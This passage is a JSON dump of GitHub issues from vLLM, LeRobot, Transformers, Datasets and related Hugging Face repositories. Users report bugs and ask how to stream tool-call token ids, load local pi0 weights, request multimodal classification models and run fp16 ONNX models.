Exactly how many and where they are missing in the request will depend on the tool call parser in use as well as the exact request format.\n\nHere's a minimal reproducer.\n\nFirst, run vLLM with a tool call parser and model. I use a Granite model for testing here, but it should be roughly the same for any model with a tool call parser.\n\n```\nvllm serve ibm-granite/granite-3.3-8b-instruct \\\n --enable-auto-tool-choice \\\n --tool-call-parser granite\n```\n\nThen, send a streaming tool call request to the server and check the response for missing tokens:\n\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(base_url=\"http://localhost:8000/v1\", api_key=\"fake\")\n\ntools = [\n {\n \"type\": \"function\",\n \"function\": {\n \"name\": \"get_current_weather\",\n \"description\": \"Get the current weather in a given location\",\n \"parameters\": {\n \"type\": \"object\",\n \"properties\": {\n \"location\": { \"type\": \"string\", \"description\": \"The city, e.g. San Francisco, CA\" },\n \"unit\": { \"type\": \"string\", \"enum\": [\"celsius\", \"fahrenheit\"] }\n },\n \"required\": [\"location\"]\n }\n }\n },\n]\nresponse = client.chat.completions.create(\n model=\"ibm-granite/granite-3.3-8b-instruct\",\n messages=[{\"role\": \"user\", \"content\": \"What is the weather in Sydney in celsius?\"}],\n tools=tools,\n tool_choice=\"auto\",\n stream=True,\n stream_options={\n \"include_usage\": True,\n \"continuous_usage_stats\": True,\n },\n extra_body={\"return_token_ids\": True},\n)\n\nreturned_token_ids = []\nlast_completion_tokens = 0\nfor event in response:\n if not getattr(event, \"choices\", None):\n continue\n choice = event.choices[0]\n usage = event.usage\n if hasattr(choice, \"token_ids\"):\n returned_token_ids.extend(choice.token_ids)\n num_token_ids = len(choice.token_ids)\n else:\n num_token_ids = 0\n elapsed_completion_tokens = usage.completion_tokens - last_completion_tokens\n if elapsed_completion_tokens != num_token_ids:\n raise ValueError(\n \"Model generated more tokens than returned by return_token_ids!\\n\"\n f\"All tokens returned so far: {returned_token_ids}\"\n )\n last_completion_tokens = usage.completion_tokens\n```\n\nRunning that, I get the following output:\n\n```\npython return_token_ids_test.py\nTraceback (most recent call last):\n File \"/Volumes/SourceCode/vllm/return_token_ids_test.py\", line 49, in \n raise ValueError(\nValueError: Model generated more tokens than returned by return_token_ids!\nAll tokens returned so far: [49154, 48685]\n```\n\nIf I add a bit of debug logging into vLLM server side and run it again, I can see the list of tokens that should have been returned:\n\n`current_token_ids: [49154, 7739, 8299, 563, 3447, 2645, 563, 313, 16716, 6161, 910, 392, 313, 2243, 563, 313, 3308, 101, 3263, 3918, 313, 426, 563, 313, 371, 81, 1700, 81, 15859, 48685]`\n\nAll of the tokens between the first and last in that list were missed by `return_token_ids`.\n\nThis code is not executed for every generated token when tool call parser (or reasoning parsers, most likely) are in use: https://github.com/vllm-project/vllm/blob/61089465a6101790635ed96c26df3e9a57d8d2c9/vllm/entrypoints/openai/serving_chat.py#L1090\n\nThe reason is because we return early at: https://github.com/vllm-project/vllm/blob/61089465a6101790635ed96c26df3e9a57d8d2c9/vllm/entrypoints/openai/serving_chat.py#L1063\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27482", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-24T16:10:31Z", "updated_at": "2025-12-04T19:09:41Z", "comments": 2, "user": "bbrowning" }, { "repo": "vllm-project/vllm", "number": 27479, "title": "[Bug]: Low GPU utilization with Embedding Model", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nInitializing LLM(model=\"Qwen/Qwen3-Embedding-0.6B\", task=\"embed\") on a single B200 (180 GB) immediately reserves ~80% GPU memory (likely PagedAttention KV block pre-allocation). During embedding, GPU-Util stays <40%, whereas a naive Transformers inference with batch_size=512 reaches >80% utilization and memory use on the same box.\n\nIs heavy KV Cache pre-allocation expected for task=\"embed\" (prefill-only)? And is there any method to improve the GPU-Util?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27479", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-24T15:18:05Z", "updated_at": "2025-10-24T15:25:38Z", "comments": 1, "user": "JhaceLam" }, { "repo": "vllm-project/vllm", "number": 27477, "title": "[Bug]: First prompt token missing when requested with \"echo\"", "body": "### Your current environment\n\nvllm installed from main: \n`vllm 0.11.1rc3.dev23+g61089465a.precompiled`\n\n### \ud83d\udc1b Describe the bug\n\nIs it expected behavior that echo isn't returning the first token of the prompt?\nI am trying to collect exact prompt_token_ids which went into the model served with vllm serve , so I am doing this:\n```bash\nVLLM_LOGGING_LEVEL=DEBUG vllm serve openai/gpt-oss-20b -tp 1 --enforce-eager --return-tokens-as-token-ids --enable-log-requests --enable-prompt-tokens-details\n```\nand with this snippet:\n```python\nfrom openai import OpenAI\n\nclient = OpenAI(\n api_key=\"EMPTY\", \n base_url=\"http://localhost:8000/v1\"\n)\n\nmessages = [\n {\"role\": \"user\", \"content\": \"Continue: The quick brown fox\"},\n]\n\nresponse = client.chat.completions.create(\n model=\"openai/gpt-oss-20b\",\n messages=messages,\n temperature=0.0,\n max_tokens=1024,\n logprobs=True,\n extra_body={\n \"echo\": True,\n }\n)\n\nprint(response.model_extra['prompt_logprobs'])\n```\n\nI am seeing: `[None, 17360, 200008, ...]` whereas the vllm server logs are printing this: `[200006, 17360, 200008, ...]` which is correct as the first token is and should be `200006` == `<|start|>` . Not sure why is it `None` in the ChatCompletion object\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27477", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-24T14:43:50Z", "updated_at": "2025-10-24T15:04:01Z", "comments": 2, "user": "eldarkurtic" }, { "repo": "huggingface/text-generation-inference", "number": 3336, "title": "Get inference endpoint model settings via client", "body": "### Feature request\n\nEnable commands via clients such as `OpenAI` that would get model settings from an inference endpoint. \n\nDoes this exist and I just can't find it?\n\n### Motivation\n\nThere is currently no clear way to get inference model settings directly from an endpoint. Individual base models have their original settings, but this does not necessarily translate to an endpoint. As an example, [Microsoft's Phi-3 model](https://huggingface.co/microsoft/Phi-3-mini-128k-instruct) supports 128k context length as input, but if instantiated as an endpoint on a 24GB gpu the allowed input context length is less (48k).\n\nThe only way I have found to access the information regarding an individual endpoint is via `huggingface_hub`, specifically:\n\n```\nfrom huggingface_hub import get_inference_endpoint\nendpoint = get_inference_endpoint(ENDPOINT_NAME, namespace=USERNAME, token=api_key)\n```\n\nTo get the general settings, you can then access the `raw` dict of the endpoint's image. For example, if I want to get the context length of a specific model at an endpoint, I can do it this way:\n```\n# the settings/specs of the endpoint in a 'llamacpp' image\nsettings = endpoint.raw['model']['image']['llamacpp']\n# this allows me to get info like context length (via the ['ctxSize']) key\n>>> print(settings['ctxSize'])\n48000\n```\n\nThis is problematic when sending prompts to an endpoint - if it were easier to query model properties programmatically, then I could write code to adjust queries on the fly appropriately depending on the target model. As it is, the sender needs to know the properties of a particular endpoint beforehand. IMO what is needed is to be able to get this info directly from a client.\n\nIn the OpenAI client in the Huggingface Inference API there seems to be some functionality for this, i.e. I can instantiate a client:\n```\nclient = OpenAI(\n base_url=endpoint, # AWS/server URL\n api_key=api_key, # huggingface token\n )\n```\nThen I can get a list of models at that url:\n```\nprint(client.models.list())\n```\nBut this only prints out basic information, which doesn't include such things as context length. Is there a way to get this info from the client that I'm just missing? I have noticed when there are errors related to input length, the client returns an error with the key `n_ctx`. For example, if a model I'm working with has a 12k context window and I send 13k tokens, the error is:\n```\nopenai.BadRequestError: Error code: 400 - {'error': {'code': 400, 'message': 'the request exceeds the available context size, try increasing it', 'type': 'exceed_context_size_error', 'n_prompt_tokens': 13954, 'n_ctx': 12032}}\n```\nThis tells me that the client has access to the overall settings, but it's not clear to me how to get them.\n\n### Your contribution\n\nHappy to work on this if someone can point me where to look for relevant code that would pass inference endpoint settings info to the client, perhaps via the `client.models.list()` method.", "url": "https://github.com/huggingface/text-generation-inference/issues/3336", "state": "closed", "labels": [], "created_at": "2025-10-24T13:07:15Z", "updated_at": "2025-10-30T14:10:46Z", "comments": 1, "user": "lingdoc" }, { "repo": "huggingface/datasets", "number": 7829, "title": "Memory leak / Large memory usage with num_workers = 0 and numerous dataset within DatasetDict", "body": "### Describe the bug\n\nHi team, first off, I love the datasets library! \ud83e\udd70\n\nI'm encountering a potential memory leak / increasing memory usage when training a model on a very large DatasetDict.\n\nSetup: I have a DatasetDict containing 362 distinct datasets, which sum up to ~2.8 billion rows.\n\nTraining Task: I'm performing contrastive learning with SentenceTransformer and Accelerate on a single node with 4 H100, which requires me to sample from only one dataset at a time.\n\nTraining Loop: At each training step, I sample ~16,000 examples from a single dataset, and then switch to a different dataset for the next step. I iterate through all 362 datasets this way. \n\nProblem: The process's memory usage continuously increases over time, eventually causing a stale status where GPUs would stop working. It seems memory from previously sampled datasets isn't being released. I've set num_workers=0 for all experiments.\n\nChart 1: Standard DatasetDict The memory usage grows steadily until it make the training stale (RSS memory) \"Image\"\n\nChart 2: IterableDatasetDict I also tried to use IterableDatasetDict and IterableDataset. The memory curve is \"smoother,\" but the result is the same: it grows indefinitely and the training become stale. \"Image\"\n\nAny feedback or guidance on how to manage this memory would be greatly appreciated!\n\n### Steps to reproduce the bug\n\nWIP, I'll add some code that manage to reproduce this error, but not straightforward. \n\n### Expected behavior\n\nThe memory usage should remain relatively constant or plateau after a few steps. Memory used for sampling one dataset should be released before or during the sampling of the next dataset.\n\n### Environment info\n\nPython: 3.12\nDatasets: 4.3.0\nSentenceTransformers: 5.1.1", "url": "https://github.com/huggingface/datasets/issues/7829", "state": "open", "labels": [], "created_at": "2025-10-24T09:51:38Z", "updated_at": "2025-11-06T13:31:26Z", "comments": 4, "user": "raphaelsty" }, { "repo": "huggingface/transformers", "number": 41842, "title": "Incorrect usage of `num_items_in_batch`?", "body": "It seems that `num_items_in_batch` is computed for all items in the batch [here](https://github.com/huggingface/transformers/blob/9c20660138830ca362533551ca978c27b48283a1/src/transformers/trainer.py#L2430).\n\nHowever, when loss is computed in the `training_step`, it is computed for each input in the batch one by one. Does it make sense to pass `num_items_in_batch` (for the whole batch) or should that number be for that particular input only?\n\nRight now, the entire batch's `num_items_in_batch` is used [here](https://github.com/huggingface/transformers/blob/9c20660138830ca362533551ca978c27b48283a1/src/transformers/trainer.py#L2486).", "url": "https://github.com/huggingface/transformers/issues/41842", "state": "closed", "labels": [], "created_at": "2025-10-24T07:36:00Z", "updated_at": "2025-12-01T08:02:48Z", "comments": 2, "user": "gohar94" }, { "repo": "vllm-project/vllm", "number": 27463, "title": "[Usage]: How to request DeepSeek-OCR with http request", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\ni want to request DeepSeek-OCR with http, is any example for it?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27463", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-24T07:07:29Z", "updated_at": "2025-10-29T17:26:49Z", "comments": 8, "user": "YosanHo" }, { "repo": "huggingface/lerobot", "number": 2306, "title": "how to use groot without flash attention", "body": "my system is ubuntu 20.04 with glibc 2.3.1 which is not supported flash attention, If I can modify the config of groot to use it with normal attention?", "url": "https://github.com/huggingface/lerobot/issues/2306", "state": "open", "labels": [ "question", "policies", "dependencies" ], "created_at": "2025-10-24T06:35:18Z", "updated_at": "2025-11-04T01:28:38Z", "user": "shs822" }, { "repo": "huggingface/lerobot", "number": 2305, "title": "Error dependence about the `Transformer` library", "body": "### System Info\n\n```Shell\n- lerobot version: 0.4.0\n- Platform: Linux-6.14.0-29-generic-x86_64-with-glibc2.39\n- Python version: 3.12.12\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 2.2.6\n- PyTorch version: 2.7.0+cu128\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.8\n- GPU model: NVIDIA RTX PRO 6000 Blackwell Workstation Edition\n- Using GPU in script?: \n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n# Environment\n\nI used the `uv` tools to auto-solve the environment. The `pyproject.toml` is shown as following.\n```\n[project]\nname = \"openpi-pytorch-env2\"\nversion = \"0.1.0\"\ndescription = \"Add your description here\"\nrequires-python = \"==3.12.12\"\ndependencies = [\n # Pytorch \u4f9d\u8d56\u9879\n \"torch==2.7.0\",\n \"torchvision==0.22.0\",\n \"torchaudio==2.7.0\",\n \"pytorch_lightning\",\n\n # lerobot-libero\n \"libero @ git+https://github.com/huggingface/lerobot-libero.git#egg=libero\",\n\n # lerobot\n \"lerobot[all] @ git+https://github.com/huggingface/lerobot.git@v0.4.0\",\n\n]\n\n[tool.uv.sources]\ntorch = { index = \"pytorch-cu128\" }\ntorchvision = { index = \"pytorch-cu128\" }\ntorchaudio = { index = \"pytorch-cu128\" }\n\n[[tool.uv.index]]\nname = \"pytorch-cu128\"\nurl = \"https://download.pytorch.org/whl/cu128\"\nexplicit = true\n```\n\n# BUG Report\n\nWhen I was running the `pi0` code\n\n```\nimport os\nimport torch\nfrom lerobot.policies.pi0.modeling_pi0 import PI0Policy\nfrom transformers import AutoTokenizer\nMODEL_PATH = os.path.expanduser(\"~/Models/pi0_base\")\npolicy = PI0Policy.from_pretrained(MODEL_PATH)\n```\n\nThere are errors like:\n\n\n```\nAn incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\nImportError: cannot import name 'check' from 'transformers.models.siglip' (/opt/miniforge3/envs/pi0_torch2/lib/python3.12/site-packages/transformers/models/siglip/__init__.py)\n\nDuring handling of the above exception, another exception occurred:\n\n File \"/home/robot/pi0/openpi_pytorch2/test_simple.py\", line 22, in \n policy = PI0Policy.from_pretrained(MODEL_PATH)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nValueError: An incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\n```\n\nThe transformer lib is auto-solved by the `pyproject.toml` in `lerobot` lib. Can you solve the error? Thanks\n\n### Expected behavior\n\nLoading the weights successfully.", "url": "https://github.com/huggingface/lerobot/issues/2305", "state": "open", "labels": [ "question", "policies", "dependencies" ], "created_at": "2025-10-24T05:59:32Z", "updated_at": "2025-11-14T16:01:49Z", "user": "sunshineharry" }, { "repo": "vllm-project/vllm", "number": 27454, "title": "[Usage]: How to set the expert id on each EP by myself after setting EP in Deepseek (how to reorder experts?)", "body": "### Your current environment\n\n```text\nvllm 0.8.5\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27454", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-24T03:15:16Z", "updated_at": "2025-10-24T07:27:50Z", "comments": 2, "user": "HameWu" }, { "repo": "vllm-project/vllm", "number": 27448, "title": "[Usage]: how to pass multi turn multimode messages to Vllm?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27448", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-24T02:41:45Z", "updated_at": "2025-10-24T03:33:13Z", "comments": 1, "user": "cqray1990" }, { "repo": "huggingface/lerobot", "number": 2304, "title": "How to load local model?", "body": "For example, i'm trying to fine-tune pi0, so I downloaded pi0_base locallly and save it in [position A,like lerobot/models/pi0_base] ,which has 5 files in total,including model.safetensors.\n\nThen how to load it in code? I used to just set model.path=[position A] But followed tuorial, it uses pretrained_path_or_name as key words.\n\nHowover, my code raised error here:\n```python\n print(f\"Loading model from: {pretrained_name_or_path}\")\n try:\n from transformers.utils import cached_file\n\n # Try safetensors first\n resolved_file = cached_file(\n pretrained_name_or_path,\n \"model.safetensors\",\n cache_dir=kwargs.get(\"cache_dir\"),\n force_download=kwargs.get(\"force_download\", False),\n resume_download=kwargs.get(\"resume_download\"),\n proxies=kwargs.get(\"proxies\"),\n use_auth_token=kwargs.get(\"use_auth_token\"),\n revision=kwargs.get(\"revision\"),\n # local_files_only=kwargs.get(\"local_files_only\", False),\n local_files_only=True # I set this for experiment but failed too\n )\n from safetensors.torch import load_file\n\n original_state_dict = load_file(resolved_file)\n print(\"\u2713 Loaded state dict from model.safetensors\")\n except Exception as e:\n print(f\"Could not load state dict from remote files: {e}\")\n print(\"Returning model without loading pretrained weights\")\n return model\n```\nIts outputs:\nLoading model from: /home/user/working_folder/lerobot/local/model/pi0_base (I use this absolute path) \nCould not load state dict from remote files: /home/user/working_folder/lerobot/local/model/pi0_base does not appear to have a file named model.safetensors. Checkout 'https://huggingface.co//home/user/working_folder/lerobot/local/model/pi0_base/tree/main' for available files.\n\nIt seems that the program see my pretrain_path_or_name as a repo_id :/\n\nHow can I introduce local pretrained path?\n\n* Ok I know that my file is incorrect. It's my bad not code's\n", "url": "https://github.com/huggingface/lerobot/issues/2304", "state": "closed", "labels": [], "created_at": "2025-10-24T01:59:26Z", "updated_at": "2025-10-24T02:33:25Z", "user": "milong26" }, { "repo": "vllm-project/vllm", "number": 27441, "title": "[Bug]: vllm/v1/core/sched/scheduler.py: Unintended reordering of requests during scheduling", "body": "### Your current environment\n\n
\nThis error is independent of the environment.\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n### Description\nThe function `schedule()` in [vllm/v1/core/sched/scheduler.py](https://github.com/vllm-project/vllm/blob/main/vllm/v1/core/sched/scheduler.py) is responsible for scheduling inference requests.\n\nIn certain cases \u2014 such as when a request is waiting for KV blocks from a remote prefill worker or when the token budget is exhausted \u2014 the request must be reinserted into the waiting queue `self.waiting`.\n\nCurrently, the implementation pops such requests, prepends them to skipped_waiting_requests, and then prepends skipped_waiting_requests back to self.waiting.\nHowever, this behavior can shuffle the request order, potentially impacting the tail latency of request serving.\n\n### How to Fix\nReplace all calls to `skipped_wating_requests.prepend_request(request)` with `skipped_wating_requests.add_request(request)`\n\n### Result\n\"Image\"\n\nThe figure compares the request-serving timelines of the original (left) and fixed (right) versions.\n* X-axis: Time\n* Y-axis: Request ID (submission order)\n* Green: Duration while the request is in `self.waiting`\n* Black: Time between GPU memory allocation and completion of the request\u2019s prefill computation\n* Red: Time between the end of prefill computation and GPU memory release (while waiting for the remote decoder to read KV blocks)\n\nThe scheduling policy used is FCFS.\nIn the original version, requests are shuffled under resource pressure. After applying the fix, the request serving order remains consistent, as expected.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27441", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-23T22:35:50Z", "updated_at": "2025-11-22T04:20:35Z", "comments": 1, "user": "dongha-yoon" }, { "repo": "huggingface/lerobot", "number": 2303, "title": "Question: Does the follower arm have an api for scripting movement?", "body": "Hi, apologies if this has been answered before or if it's not the right place to ask. I've been using the SO-101 arms for imitation learning, but recently I've wanted to try and test out the follower arm for embodied reasoning models such as Gemini ER 1.5. To do this, I figure I would need to have some way to map outputs from the ER model (coordinates or general, high-level movements) to movements for the SO-101. Does the SO-101 has an API for this type of low-level movement control, e.g. if I just wanted to move it pre-scripted in space using coordinates or motor motion? What would the code for this type of low-level movement look? \n\nThank you so much for any and all help!", "url": "https://github.com/huggingface/lerobot/issues/2303", "state": "open", "labels": [ "question", "robots", "python" ], "created_at": "2025-10-23T20:40:56Z", "updated_at": "2025-10-23T22:29:28Z", "user": "Buttmunky1" }, { "repo": "huggingface/lerobot", "number": 2294, "title": "Question about the HuggingFaceVLA/smolvla_libero Model Configuration", "body": "Hello,\n\nLerobot has officially ported [LIBERO](https://github.com/huggingface/lerobot/issues/1369#issuecomment-3323183721), and we can use the checkpoint at [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero) to evaluate the LIBERO benchmark.\n\nHowever, the model configuration of [HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero) appears to differ from the [original model](https://huggingface.co/lerobot/smolvla_base). For example:\n\n[lerobot/smolvla_base](https://huggingface.co/lerobot/smolvla_base/blob/main/config.json)\n```json\n{\n \"vlm_model_name\": \"HuggingFaceTB/SmolVLM2-500M-Video-Instruct\",\n \"load_vlm_weights\": true,\n \"add_image_special_tokens\": false,\n \"attention_mode\": \"cross_attn\",\n \"prefix_length\": 0,\n \"pad_language_to\": \"max_length\",\n \"num_expert_layers\": 0,\n \"num_vlm_layers\": 16,\n \"self_attn_every_n_layers\": 2,\n \"expert_width_multiplier\": 0.75\n}\n```\n\n[HuggingFaceVLA/smolvla_libero](https://huggingface.co/HuggingFaceVLA/smolvla_libero/blob/main/config.json)\n```json\n{\n \"vlm_model_name\": \"HuggingFaceTB/SmolVLM2-500M-Instruct\",\n \"load_vlm_weights\": true,\n \"add_image_special_tokens\": false,\n \"attention_mode\": \"cross_attn\",\n \"prefix_length\": 0,\n \"pad_language_to\": \"longest\",\n \"num_expert_layers\": -1,\n \"num_vlm_layers\": 0, <- it becomes 32 when model is initialized\n \"self_attn_every_n_layers\": 2,\n \"expert_width_multiplier\": 0.5,\n}\n```\n\nIn particular, `num_vlm_layers` is set to 32 across all layers, which is not consistent with the [paper](https://arxiv.org/pdf/2506.01844) where they use half of them (16 layers).\nCould you provide the original model checkpoint and the training recipe so we can reproduce the LIBERO benchmark performance?", "url": "https://github.com/huggingface/lerobot/issues/2294", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-23T13:37:48Z", "updated_at": "2025-10-30T07:49:17Z", "user": "Hesh0629" }, { "repo": "vllm-project/vllm", "number": 27413, "title": "[Usage]: how to request a qwen2.5-VL-7B classify model served by vllm using openai SDK?", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI launch a server with the following command to serving a Qwen2.5-VL-7B model finetued for seqence classification. (this model replaced the lm_head with a 2 classes score_head)\n\nThe launch command is :\n```\nvllm serve --model=//video_classification/qwenvl_7b_video_cls/v5-20251011-121851/2340_vllm_format --served_model_name Qwen2.5-7B-shenhe --task=classify --port=8080 --tensor-parallel-size=2\n```\n\nI don't know how to request the server with the openAI sdk.\nI use the code snnipet showed below which works well with pure text, but it got 400 bad request when I put the video url into the prompt\n\nthis works well:\n```\n# SPDX-License-Identifier: Apache-2.0\n# SPDX-FileCopyrightText: Copyright contributors to the vLLM project\n\"\"\"Example Python client for classification API using vLLM API server\nNOTE:\n start a supported classification model server with `vllm serve`, e.g.\n vllm serve jason9693/Qwen2.5-1.5B-apeach\n\"\"\"\n\nimport argparse\nimport pprint\n\nimport requests\n\n\ndef post_http_request(payload: dict, api_url: str) -> requests.Response:\n headers = {\"User-Agent\": \"Test Client\"}\n response = requests.post(api_url, headers=headers, json=payload)\n return response\n\n\ndef parse_args():\n parse = argparse.ArgumentParser()\n parse.add_argument(\"--host\", type=str, default=\"localhost\")\n parse.add_argument(\"--port\", type=int, default=8000)\n parse.add_argument(\"--model\", type=str, default=\"jason9693/Qwen2.5-1.5B-apeach\")\n return parse.parse_args()\n\n\ndef main(args):\n host = args.host\n port = args.port\n model_name = args.model\n\n api_url = f\"http://{host}:{port}/classify\"\n prompts = [\n \"Hello, my name is\",\n \"The president of the United States is\",\n \"The capital of France is\",\n \"The future of AI is\",\n ]\n\n payload = {\n \"model\": model_name,\n \"input\": prompts,\n }\n\n classify_response = post_http_request(payload=payload, api_url=api_url)\n pprint.pprint(classify_response.json())\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n```\n\nbut if I replace the prompts with multimodal data, the server doesn't work.\n```\nvideo_url = \"https://js-ad.a.yximgs.com/bs2/ad_nieuwland-material/t2i2v/videos/3525031242883943515-140276939618048_24597237897733_v0_1759927515165406_3.mp4\"\n\n prompts = [\n {\"role\": \"user\", \"content\": [\n {\"type\": \"text\", \"text\": \"\u4f60\u662f\u4e00\u4e2a\u4e13\u4e1a\u7684\u89c6\u9891\u8d28\u91cf\u5206\u6790\u5e08\uff0c\u8bf7\u4f60\u4ed4\u7ec6\u5224\u65ad\u4e0b\u65b9\u63d0\u4f9b\u7684\u89c6\u9891\u662f\u5426\u5b58\u5728\u8d28\u91cf\u95ee\u9898\\n\u8d28\u91cf\u95ee\u9898\u5305\u62ec\u4f46\u4e0d\u9650\u4e8e\uff1a\\n1.\u753b\u9762\u8d28\u91cf\u5dee,\u753b\u9762\u6a21\u7cca\uff0c\u4eae\u5ea6\u95ea\u70c1\\n2.\u753b\u9762\u4e2d\u6587\u5b57\u5b58\u5728\u6a21\u7cca\u95ee\u9898\\n3.\u89c6\u9891\u753b\u9762\u4e0d\u7b26\u5408\u771f\u5b9e\u7269\u7406\u903b\u8f91\uff0c\u4f8b\u5982\u51ed\u7a7a\u4ea7\u751f\u7684\u4eba\u7269\u80a2\u4f53\u3001\u5934\u50cf\u3001\u624b\u6307\u624b\u81c2\u6570\u91cf\u4e0d\u5bf9\uff0c\u817f\u90e8\u4e0d\u81ea\u7136\u7b49\u95ee\u9898\\n4.\u753b\u9762\u8fd0\u52a8\u4e0d\u7b26\u5408\u7269\u7406\u89c4\u5f8b\uff0c\u4f8b\u5982\u51ed\u7a7a\u4ea7\u751f\u7684\u7269\u4f53\uff0c\u753b\u9762\u5361\u987f\u3001\u6643\u52a8\u3001\u6296\u52a8\u3001\u8df3\u52a8\u7b49\\n\\n\u5982\u679c\u89c6\u9891\u5b58\u5728\u95ee\u9898\u8bf7\u8fd4\u56de0\uff0c\u5982\u679c\u89c6\u9891\u4e0d\u5b58\u5728\u95ee\u9898\u8bf7\u8fd4\u56de1\u3002\\n## \u89c6\u9891\u5185\u5bb9\u5982\u4e0b\\n\"},\n {\"type\": \"video\", \"video\": f\"{video_url}\"},\n ]\n }\n ]\n\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27413", "state": "open", "labels": [ "good first issue", "usage" ], "created_at": "2025-10-23T12:32:25Z", "updated_at": "2025-10-25T00:18:54Z", "comments": 12, "user": "muziyongshixin" }, { "repo": "huggingface/transformers.js", "number": 1447, "title": "How to use half precision ONNX models?", "body": "### Question\n\nHi,\n\nI just exported a detection model with fp16 using optimum.\n`--dtype fp16 `\n\nThis is my pipeline:\n\n```javascript\nconst model = await AutoModel.from_pretrained(\n \"./onnx_llama\",\n { dtype: \"fp16\", device: \"cpu\" } \nconst processor = await AutoProcessor.from_pretrained(\"./onnx_llama\");\nconst { pixel_values, reshaped_input_sizes } = await processor(image);\nconst buffer = await fs.readFile(\"image3.jpg\");\nconst blob = new Blob([buffer]);\n\nconst image = await RawImage.fromBlob(blob);\nconst { pixel_values, reshaped_input_sizes } = await processor(image);\nconst { output0 } = await model({ pixel_values: tensor });\n```\nUsing this results in:\nAn error occurred during model execution: \"Error: Unexpected input data type. Actual: (tensor(float)) , expected: (tensor(float16))\".\n\nWhich makes sense, however when i try to convert to fp16 \"manually\"\n\n```javascript\nconst fp16data = Float16Array.from(pixel_values.data); //float32ArrayToUint16Array(pixel_values.data);\nconst tensor = new Tensor(\"float16\", fp16data, pixel_values.dims);\nconst { output0 } = await model({ pixel_values:tensor });\n```\n\nI get:\n`Tensor.data must be a typed array (4) for float16 tensors, but got typed array (0).`\n\nWhat's going on here? I tried to converting the `pixel_data.data` to a UInt16Array manually but that has no effect as it gets converted to a Float16Array in the tensor constructor anyway.\n\nHelp is much appreciated!\n\nThanks", "url": "https://github.com/huggingface/transformers.js/issues/1447", "state": "open", "labels": [ "question" ], "created_at": "2025-10-23T09:18:26Z", "updated_at": "2025-10-23T09:18:26Z", "user": "richarddd" }, { "repo": "huggingface/transformers", "number": 41810, "title": "How do you use t5gemma decoder with a different encoder?", "body": "I am trying to combine the t5gemma decoder with a pretrained deberta encoder that I have trained from scratch using `EncoderDecoderModel`. \n\nHere is the code:\n\n```\nmodel_1 = \"WikiQuality/pre_filtered.am\"\nmodel_2 = \"google/t5gemma-2b-2b-ul2\"\n\nencoder = AutoModel.from_pretrained(model_1)\ndecoder = AutoModel.from_pretrained(model_2, dtype=torch.bfloat16)\n\nmodel = EncoderDecoderModel(encoder=encoder, decoder=decoder)\n```\n\nThe above code raises the error:\n```\nAttributeError: 'T5GemmaConfig' object has no attribute 'hidden_size'\n```\n\nFrom this I understand that `hidden_size` is accesible from `decoder.config.decoder.hidden_size` and not `decoder.config.hidden_size`, which is where EncoderDecoderModel is looking. So I change my code to load the encoder-decoder model to this:\n\n```\nmodel = 